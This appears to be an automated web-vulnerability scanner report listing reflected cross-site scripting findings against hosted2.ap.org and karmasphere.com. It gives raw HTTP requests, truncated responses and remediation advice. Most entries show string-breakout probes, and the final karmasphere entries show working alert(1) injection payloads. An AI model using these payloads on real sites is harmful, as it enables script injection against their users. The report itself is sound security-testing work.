GET /CTMID/a6ce7ad62f4a4c5c8250b214160940924fcab'%3b4f3ddbec193/Article_2011-01-30-Indonesia%20Sex%20Video%20Trial/id-213e6b7bd15d4ef5bc30feb6708734d8 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86367
Date: Tue, 01 Feb 2011 02:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59266
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940924fcab';4f3ddbec193/id-213e6b7bd15d4ef5bc30feb6708734d8'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 356cd'%3b1a8499b573d was submitted in the REST URL parameter 2. This input was echoed as 356cd';1a8499b573d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092356cd'%3b1a8499b573d/Article_2011-01-30-Sundance%20Awards/id-277f03ce0f9c459abba5c03f3c938e1c HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 18:32:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64312
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092356cd';1a8499b573d/id-277f03ce0f9c459abba5c03f3c938e1c'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e705'%3b67f6518824b was submitted in the REST URL parameter 2. This input was echoed as 3e705';67f6518824b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923e705'%3b67f6518824b/Article_2011-01-30-Sundance%20Robert%20Redford/id-32ad9c0214b247758471c69154543756 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86374
Date: Mon, 31 Jan 2011 02:59:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58151
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923e705';67f6518824b/id-32ad9c0214b247758471c69154543756'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7de0'%3bdbf51417c7b was submitted in the REST URL parameter 2. This input was echoed as e7de0';dbf51417c7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092e7de0'%3bdbf51417c7b/Article_2011-01-30-Sundance%20Robert%20Redford/id-85e83382aba74ebeb786ba994d03a505 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Mon, 31 Jan 2011 00:55:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58138
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092e7de0';dbf51417c7b/id-85e83382aba74ebeb786ba994d03a505'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3efb5'%3b433c442cfeb was submitted in the REST URL parameter 2. This input was echoed as 3efb5';433c442cfeb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923efb5'%3b433c442cfeb/Article_2011-01-31-Atlantic%20City%20Roaring%20/'20s/id-e2c33e414a2e4d909836ea680862ae04 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86371
Date: Tue, 01 Feb 2011 02:41:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 72158
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923efb5';433c442cfeb/id-e2c33e414a2e4d909836ea680862ae04'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b965'%3b0783883b990 was submitted in the REST URL parameter 2. This input was echoed as 6b965';0783883b990 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940926b965'%3b0783883b990/Article_2011-01-31-Awards%20Party/id-092bb74a546f472faf6eddfcb146ea40 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86381
Date: Tue, 01 Feb 2011 02:41:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61394
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940926b965';0783883b990/id-092bb74a546f472faf6eddfcb146ea40'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41a60'%3bd0bf655646 was submitted in the REST URL parameter 2. This input was echoed as 41a60';d0bf655646 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409241a60'%3bd0bf655646/Article_2011-01-31-Awards/id-86eb654ac57948919c1ac301e645ef65 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86341
Date: Tue, 01 Feb 2011 02:41:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 72081
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409241a60';d0bf655646/id-86eb654ac57948919c1ac301e645ef65'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d716'%3b4212e4d3a53 was submitted in the REST URL parameter 2. This input was echoed as 3d716';4212e4d3a53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923d716'%3b4212e4d3a53/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-2ea81b40b1f943009a88bb75d1b8013a HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86365
Date: Tue, 01 Feb 2011 02:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67448
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923d716';4212e4d3a53/id-2ea81b40b1f943009a88bb75d1b8013a'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 383c4'%3b76aa8c010 was submitted in the REST URL parameter 2. This input was echoed as 383c4';76aa8c010 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092383c4'%3b76aa8c010/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-2ed743e340bd4886ac0759fd4711fee7 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Tue, 01 Feb 2011 02:41:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70273
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092383c4';76aa8c010/id-2ed743e340bd4886ac0759fd4711fee7'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e7b2'%3bcce1fb12b12 was submitted in the REST URL parameter 2. This input was echoed as 5e7b2';cce1fb12b12 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940925e7b2'%3bcce1fb12b12/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-2ef74d89f2ab4e9f9f44060a7347af13 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Tue, 01 Feb 2011 02:40:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64343
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940925e7b2';cce1fb12b12/id-2ef74d89f2ab4e9f9f44060a7347af13'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee731'%3b9fe2a726c83 was submitted in the REST URL parameter 2. This input was echoed as ee731';9fe2a726c83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092ee731'%3b9fe2a726c83/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-4bf93acb64bc4a8c88199515dc8e27ee HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Tue, 01 Feb 2011 02:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69709
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092ee731';9fe2a726c83/id-4bf93acb64bc4a8c88199515dc8e27ee'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ad52'%3bfa8e94df901 was submitted in the REST URL parameter 2. This input was echoed as 3ad52';fa8e94df901 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923ad52'%3bfa8e94df901/Article_2011-01-31-New%20Zealand%20People%20Peter%20Jackson/id-ba1059136a1f4718af76e79fa4da327a HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86362
Date: Tue, 01 Feb 2011 02:41:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923ad52';fa8e94df901/id-ba1059136a1f4718af76e79fa4da327a'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68f98'%3b8e600690d63 was submitted in the REST URL parameter 2. This input was echoed as 68f98';8e600690d63 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409268f98'%3b8e600690d63/Article_2011-01-31-Obit%20John%20Barry/id-983e99213b134bf89a5a99fbdab49883 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86380
Date: Tue, 01 Feb 2011 02:41:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55274
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409268f98';8e600690d63/id-983e99213b134bf89a5a99fbdab49883'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b9f'%3bdca03a1034b was submitted in the REST URL parameter 2. This input was echoed as 47b9f';dca03a1034b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409247b9f'%3bdca03a1034b/Article_2011-01-31-Obit%20John%20Barry/id-e3f424e196884e6c830498b8f66bd938 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86378
Date: Tue, 01 Feb 2011 02:41:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61845
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409247b9f';dca03a1034b/id-e3f424e196884e6c830498b8f66bd938'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b56cb'%3balert(1)//aa2963cc597 was submitted in the REST URL parameter 1. This input was echoed as b56cb';alert(1)//aa2963cc597 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /In-The-Newsb56cb'%3balert(1)//aa2963cc597/hadoop-basics-and-development-with-karmasphere.html HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:02:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:21 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/In-The-Newsb56cb';alert(1)//aa2963cc597/hadoop-basics-and-development-with-karmasphere.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, d ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 474d7'%3balert(1)//5a22ddb751a was submitted in the REST URL parameter 2. This input was echoed as 474d7';alert(1)//5a22ddb751a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /In-The-News/474d7'%3balert(1)//5a22ddb751a HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
